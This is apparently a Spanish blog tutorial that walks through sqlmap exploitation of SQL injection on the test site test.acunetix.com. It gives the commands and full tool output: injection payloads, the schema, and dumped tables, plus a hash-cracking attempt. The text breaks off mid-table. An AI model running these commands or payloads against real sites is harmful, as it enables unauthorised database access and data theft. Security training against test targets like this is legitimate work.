Tag Archive | SQLMap
SQLMap
Hola!
Muy buenas a todos/as!
SQLMap es una herramienta para automatizar la explotación de vulnerabilidades SQL.
Para disponer de la última versión y, por lo tanto poder usar todas sus características bajamos la última versión con svn
root@bt:/pentest/database/sqlmap# svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
Ya disponemos de la última versión de SQLMap.
Ahora empezaremos ha hacer una prueba.
Primero hay que encontrar una página web vulnerable, y además si permite hacer inyección y extraer información.
Empezamos,
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool http://www.sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 16:36:55 [16:36:55] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file [16:36:55] [INFO] resuming injection data from session file [16:36:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [16:36:55] [INFO] testing connection to the target url [16:36:56] [INFO] heuristics detected web page charset 'ascii' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 1192=1192 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58), (SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR), CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --- [16:36:56] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [16:36:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com' [*] shutting down at 16:36:56
He remarcado en rojo información importante.
Podemos ver que es vulnerable así que ahora extraeremos tanto los usuarios como las bases de datos
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 --dbs --users sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool http://www.sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 16:41:00 [16:41:00] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file [16:41:00] [INFO] resuming injection data from session file [16:41:00] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [16:41:00] [INFO] testing connection to the target url [16:41:01] [INFO] heuristics detected web page charset 'ascii' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 1192=1192 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58), (SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR), CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --- [16:41:01] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [16:41:01] [INFO] fetching database users database management system users [1]: [*] 'acuart'@'localhost' [16:41:01] [INFO] fetching database names available databases [3]: [*] acuart [*] information_schema [*] modrewriteShop [16:41:01] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com' [*] shutting down at 16:41:01
Queda remaracado en rojo información acerca de la bases de datos además del usuario.
Ahora sacaremos las tablas concretas de una base de datos
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 -D acuart --tables sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool http://www.sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 16:46:44 [16:46:44] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file [16:46:44] [INFO] resuming injection data from session file [16:46:44] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [16:46:45] [INFO] testing connection to the target url [16:46:45] [INFO] heuristics detected web page charset 'ascii' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 1192=1192 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58), (SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR), CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --- [16:46:45] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [16:46:45] [INFO] fetching tables for database: acuart [16:46:45] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures, acuart, users Database: acuart [7 tables] +-----------+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | users | +-----------+ [16:46:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com' [*] shutting down at 16:46:45
Ahora que ya tenemos las tablas, iremos a buscar las columnas
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 -D acuart --columns sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool http://www.sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 16:50:28 [16:50:28] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file [16:50:28] [INFO] resuming injection data from session file [16:50:28] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [16:50:29] [INFO] testing connection to the target url [16:50:29] [INFO] heuristics detected web page charset 'ascii' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 1192=1192 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --- [16:50:29] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [16:50:29] [INFO] fetching tables for database: acuart [16:50:29] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures, acuart, users [16:50:29] [INFO] fetching columns for table 'guestbook' on database 'acuart' [16:50:29] [INFO] fetching columns for table 'carts' on database 'acuart' [16:50:30] [INFO] fetching columns for table 'categ' on database 'acuart' [16:50:30] [INFO] fetching columns for table 'featured' on database 'acuart' [16:50:30] [INFO] fetching columns for table 'artists' on database 'acuart' [16:50:31] [INFO] fetching columns for table 'pictures' on database 'acuart' [16:50:31] [INFO] fetching columns for table 'users' on database 'acuart' Database: acuart Table: categ [3 columns] +--------+-------------+ | Column | Type | +--------+-------------+ | cat_id | int(5) | | cdesc | tinytext | | cname | varchar(50) | +--------+-------------+ Database: acuart Table: users [8 columns] +---------+--------------+ | Column | Type | +---------+--------------+ | address | mediumtext | | cart | varchar(100) | | cc | varchar(100) | | email | varchar(100) | | name | varchar(100) | | pass | varchar(100) | | phone | varchar(100) | | uname | varchar(100) | +---------+--------------+ Database: acuart Table: carts [3 columns] +---------+--------------+ | Column | Type | +---------+--------------+ | cart_id | varchar(100) | | item | int(11) | | price | int(11) | +---------+--------------+ Database: acuart Table: pictures [8 columns] +--------+--------------+ | Column | Type | +--------+--------------+ | a_id | int(11) | | cat_id | int(11) | | img | varchar(50) | | pic_id | int(5) | | plong | text | | price | int(11) | | pshort | mediumtext | | title | varchar(100) | +--------+--------------+ Database: acuart Table: featured [2 columns] +--------------+---------+ | Column | Type | +--------------+---------+ | feature_text | text | | pic_id | int(11) | +--------------+---------+ Database: acuart Table: artists [3 columns] +-----------+-------------+ | Column | Type | +-----------+-------------+ | adesc | text | | aname | varchar(50) | | artist_id | int(5) | +-----------+-------------+ Database: acuart Table: guestbook [3 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | mesaj | text | | sender | varchar(150) | | senttime | int(32) | +----------+--------------+ [16:50:31] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com' [*] shutting down at 16:50:31
Ya tenemos la información referente a las columnas
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 -D acuart --dump sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool http://www.sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 16:56:33 [16:56:33] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file [16:56:33] [INFO] resuming injection data from session file [16:56:33] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [16:56:33] [INFO] testing connection to the target url [16:56:34] [INFO] heuristics detected web page charset 'ascii' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 1192=1192 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58), (SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --- [16:56:34] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [16:56:34] [INFO] fetching tables for database: acuart [16:56:34] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures, acuart, users [16:56:34] [INFO] fetching columns for table 'guestbook' on database 'acuart' [16:56:34] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': sender, varchar(150), mesaj, text, senttime, int(32) [16:56:34] [INFO] fetching entries for table 'guestbook' on database 'acuart' [16:56:35] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues) [16:56:35] [WARNING] the SQL query provided does not return any output Database: acuart Table: guestbook [0 entries] +-------+--------+----------+ | mesaj | sender | senttime | +-------+--------+----------+ +-------+--------+----------+ [16:56:35] [INFO] Table 'acuart.guestbook' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com /dump/acuart/guestbook.csv' [16:56:35] [INFO] fetching columns for table 'carts' on database 'acuart' [16:56:35] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': cart_id, varchar(100), price, int(11), item, int(11) [16:56:35] [INFO] fetching entries for table 'carts' on database 'acuart' recognized possible password hashes in column cart_id. Do you want to crack them via a dictionary-based attack? [Y/n/q] y [16:56:51] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file (press Enter) [2] custom dictionary file [3] file with list of dictionary files [16:57:04] [INFO] using default dictionary [16:57:04] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt' do you want to use common password suffixes? (slow!) [y/N] n [16:57:10] [INFO] starting dictionary-based cracking (md5_generic_passwd) [16:57:46] [WARNING] no clear password(s) found Database: acuart Table: carts [43 entries] +----------------------------------+------------+-------+ | cart_id | item | price | +----------------------------------+------------+-------+ | 59bc1b0b420b28ec09d673886c9e6c5e | 6 | 10000 | | 92cd2d36a3ebf3e3227f8573f8682b98 | 0 | 500 | | 59bc1b0b420b28ec09d673886c9e6c5e | 7 | 15000 | | 103182aada3cc3df0f6eb53e12338805 | 3 | 986 | | 62d636f894e9e726dc6a0300fd2aa2f3 | 3 | 986 | | 407f7a7006ae7e1e290a0deef4adddca | 5 | 444 | | 407f7a7006ae7e1e290a0deef4adddca | 2 | 1230 | | 92cd2d36a3ebf3e3227f8573f8682b98 | -268435455 | 500 | | 59bc1b0b420b28ec09d673886c9e6c5e | 3 | 986 | | 94e69794012f981ba39b45e3d67b9bb4 | 6 | 10000 | | 92cd2d36a3ebf3e3227f8573f8682b98 | -1 | 500 | | 92cd2d36a3ebf3e3227f8573f8682b98 | 3 | 986 | | ee7a540800a6314cb8e853294a3fd364 | -268435455 | 986 | | 92cd2d36a3ebf3e3227f8573f8682b98 | 2 | 800 | | 103182aada3cc3df0f6eb53e12338805 | 4 | 1000 | | 92cd2d36a3ebf3e3227f8573f8682b98 | 6 | 10000 | | ee7a540800a6314cb8e853294a3fd364 | 0 | 986 | | 103182aada3cc3df0f6eb53e12338805 | 6 | 10000 | | 103182aada3cc3df0f6eb53e12338805 | 1 | 500 | | 407f7a7006ae7e1e290a0deef4adddca | 7 | 1 | | ee7a540800a6314cb8e853294a3fd364 | -1 | 986 | | fb410f050b45babb0fa88ae1c7e5dcce | 2 | 800 | | 407f7a7006ae7e1e290a0deef4adddca | 1 | 500 | | 92cd2d36a3ebf3e3227f8573f8682b98 | 5 | 460 | | 3fc1a7bc4d6afab0889708ed649f5e59 | 1 | 500 | | 59bc1b0b420b28ec09d673886c9e6c5e | 1 | 500 | | 59bc1b0b420b28ec09d673886c9e6c5e | 2 | 800 | | 92cd2d36a3ebf3e3227f8573f8682b98 | 7 | 15000 | | 92cd2d36a3ebf3e3227f8573f8682b98 | 4 | 1000 | | ee7a540800a6314cb8e853294a3fd364 | 268435455 | 986 | | 62d636f894e9e726dc6a0300fd2aa2f3 | 1 | 500 | | ee7a540800a6314cb8e853294a3fd364 | 3 | 986 | | 407f7a7006ae7e1e290a0deef4adddca | 6 | 123 | | 357dce450e0ca7bd2d1c04f55905e10f | 1 | 500 | | 92cd2d36a3ebf3e3227f8573f8682b98 | 268435455 | 500 | | 59bc1b0b420b28ec09d673886c9e6c5e | 4 | 1000 | | a33e8f5069b5a8d7e6b579697bfaf96d | 1 | 500 | | 59bc1b0b420b28ec09d673886c9e6c5e | 5 | 460 | | e8513b2f278260d085e29bc4491cdf0b | 2 | 8 | | 94e69794012f981ba39b45e3d67b9bb4 | 3 | 986 | | 92cd2d36a3ebf3e3227f8573f8682b98 | 1 | 500 | | 62d636f894e9e726dc6a0300fd2aa2f3 | 2 | 800 | | 9c7ab77a32a914594d838f1e657f56ab | 5 | 100 | +----------------------------------+------------+-------+ [16:57:46] [INFO] Table 'acuart.carts' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump/acuart/carts.csv' [16:57:46] [INFO] fetching columns for table 'categ' on database 'acuart' [16:57:46] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': cat_id, int(5), cname, varchar(50), cdesc, tinytext [16:57:46] [INFO] fetching entries for table 'categ' on database 'acuart' Database: acuart Table: categ [4 entries] +--------+--------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------+-----------+ | cat_id | cdesc | cname | +--------+------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------- --------------------------------------------------------+-----------+ | 1 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenati | Posters | | 3 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenati | Stickers | | 4 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenati | Graffity | | 2 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenati | Paintings | +--------+--------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------ -----------------------------------------+-----------+ [16:57:48] [INFO] Table 'acuart.categ' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump /acuart/categ.csv' [16:57:48] [INFO] fetching columns for table 'featured' on database 'acuart' [16:57:48] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': pic_id, int(11), feature_text, text [16:57:48] [INFO] fetching entries for table 'featured' on database 'acuart' [16:57:48] [WARNING] the SQL query provided does not return any output Database: acuart Table: featured [0 entries] +--------------+--------+ | feature_text | pic_id | +--------------+--------+ +--------------+--------+ [16:57:48] [INFO] Table 'acuart.featured' dumped to CSV file '/pentest/database/sqlmap/output /test.acunetix.com/dump/acuart/featured.csv' [16:57:48] [INFO] fetching columns for table 'artists' on database 'acuart' [16:57:48] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': artist_id, int(5), aname, varchar(50), adesc, text [16:57:48] [INFO] fetching entries for table 'artists' on database 'acuart' Database: acuart Table: artists [3 entries] +-------------------------------------------------------------------------------- ------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------ -+---------+-----------+ | adesc | aname | artist_id | +--------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------- ---------------+---------+-----------+ | <p>\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\ nPraesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\nmauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\nlitora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor.\n</p>\n<p>\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\nPraesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\nmauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\nlitora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor .\n</p> | lyzae | 3 | | <p>\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\n Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\n mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\n litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\n Mauris magna eros, semper a, tempor et, rutrum et, tortor.\n</p>\n<p>\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\n Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\n mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\n litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\n Mauris magna eros, semper a, tempor et, rutrum et, tortor.\n</p> | r4w8173 | 1 | | <p>\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\nPraesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\nmauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\nlitora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor.\n</p>\n<p>\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\nPraesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\nmauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\nlitora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor.\n</p> | Blad3 | 2 | +----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+-----------+ [16:57:49] [INFO] Table 'acuart.artists' dumped to CSV file '/pentest/database/sqlmap/output/ test.acunetix.com/dump/acuart/artists.csv' [16:57:49] [INFO] fetching columns for table 'pictures' on database 'acuart' [16:57:49] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': pic_id, int(5), pshort, mediumtext, plong, text, price, int(11), cat_id, int(11), a_id, int(11), title, varchar(100), img, varchar(50) [16:57:49] [INFO] fetching entries for table 'pictures' on database 'acuart' Database: acuart Table: pictures [7 entries] +------+--------+------------------+--------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+-------------------------------------------------------------------------------------------------------------------------------+--------------+ | a_id | cat_id | img | pic_id | plong | price | pshort | title | +------+--------+------------------+--------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+-------------------------------------------------------------------------------------------------------------------------------+--------------+ | 2 | 1 | ./pictures/7.jpg | 7 | bla bla bla long | 15000 | bla bla bla | Trees | | 1 | 2 | ./pictures/6.jpg | 6 | <p>\nThis picture is an 99 cm x 200 cm masterpiece.\ n</p>\n<p>\nThis text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. \n</p> | 10000 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin.\n | Thing | | 1 | 1 | ./pictures/5.jpg | 5 | <p>\nThis picture is an 53 cm x 12 cm masterpiece.\n</p>\n<p>\nThis text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. \n</p> | 460 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. | Mean | | 1 | 1 | ./pictures/2.jpg | 2 | <p>\nThis picture is an 53 cm x 12 cm masterpiece.\n</p>\n<p>\nThis text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. \n</p> | 800 | Donec molestie.\nSed aliquam sem ut arcu. | Mistery | | 1 | 1 | ./pictures/1.jpg | 1 | <p>\nThis picture is an 53 cm x 12 cm masterpiece.\n</p>\n<p>\nThis text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. \n</p> | 500 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. | The shore | | 1 | 1 | ./pictures/4.jpg | 4 | <p>\nThis picture is an 53 cm x 12 cm masterpiece.\n</p>\n<p>\nThis text is not meant 